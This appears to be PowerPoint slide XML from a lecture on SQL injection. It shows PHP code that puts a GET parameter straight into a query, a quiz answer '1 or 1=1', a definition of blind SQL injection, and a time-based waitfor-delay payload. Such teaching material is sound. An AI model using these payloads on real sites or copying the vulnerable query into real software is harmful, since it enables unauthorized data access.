          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SELECT FROM users where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>-1 or admin=true </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7751298" y="3774173"/>
            <a:ext cx="1418978" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>adminuser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3928009" y="2631180"/>
            <a:ext cx="1418978" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>adminuser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2703584" y="1606667"/>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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1716162" y="44354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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8234557" y="333245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smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3478013" y="267356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smtClean="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Picture 23"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:duotone>
              <a:schemeClr val="accent1">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1824256" y="2926933"/>
            <a:ext cx="1219200" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="144822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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Snip Single Corner Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="862106" y="152400"/>
            <a:ext cx="7543800" cy="2133600"/>
          </a:xfrm>
          <a:prstGeom prst="snip1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t" anchorCtr="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>id = $_GET['id']</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>getid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = "SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>first_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>last_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> FROM users </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	    WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$id"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>result = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mysql_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>getid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>) or die('&lt;pre&gt;' . </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mysql_error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>() . '&lt;/pre&gt;' );</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rounded Rectangular Callout 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="3148106"/>
            <a:ext cx="4648200" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 13561"/>
              <a:gd name="adj2" fmla="val -159313"/>
              <a:gd name="adj3" fmla="val 16667"/>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800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Guess as to the exploit?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1619043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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Snip Single Corner Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="862106" y="152400"/>
            <a:ext cx="7543800" cy="2133600"/>
          </a:xfrm>
          <a:prstGeom prst="snip1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t" anchorCtr="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>id = $_GET['id']</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>getid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = "SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>first_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>last_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> FROM users </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	    WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$id"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>result = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mysql_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>getid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>) or die('&lt;pre&gt;' . </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mysql_error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>() . '&lt;/pre&gt;' );</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rounded Rectangular Callout 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5167406" y="3910106"/>
            <a:ext cx="3238500" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 15490"/>
              <a:gd name="adj2" fmla="val -25539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Solution: 1 or 1=1;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="Screen Shot 2012-07-02 at 2.3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2286000"/>
            <a:ext cx="4102100" cy="4572000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="400877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4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1371600"/>
            <a:ext cx="8229600" cy="4648199"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Defn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" smtClean="0"/>
              <a:t>blind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> SQL injection attack is an attack against a server that responds with generic error page or even nothing at all.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Approach: ask a series of True/False questions, exploit side-channels</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="481495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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6504189" y="1418949"/>
            <a:ext cx="1600200" cy="2304288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7260021" y="5029200"/>
            <a:ext cx="911250" cy="1260000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1941128"/>
            <a:ext cx="2182611" cy="1270475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Arrow Connector 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3162300" y="2209800"/>
            <a:ext cx="28194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7848600" y="3322637"/>
            <a:ext cx="1" cy="163036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93338" y="1563469"/>
            <a:ext cx="3810851" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>if ASCII(SUBSTRING(username,1,1)) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>= 64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>waitfor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> delay ‘0:0:5’</a:t>
            </a:r>
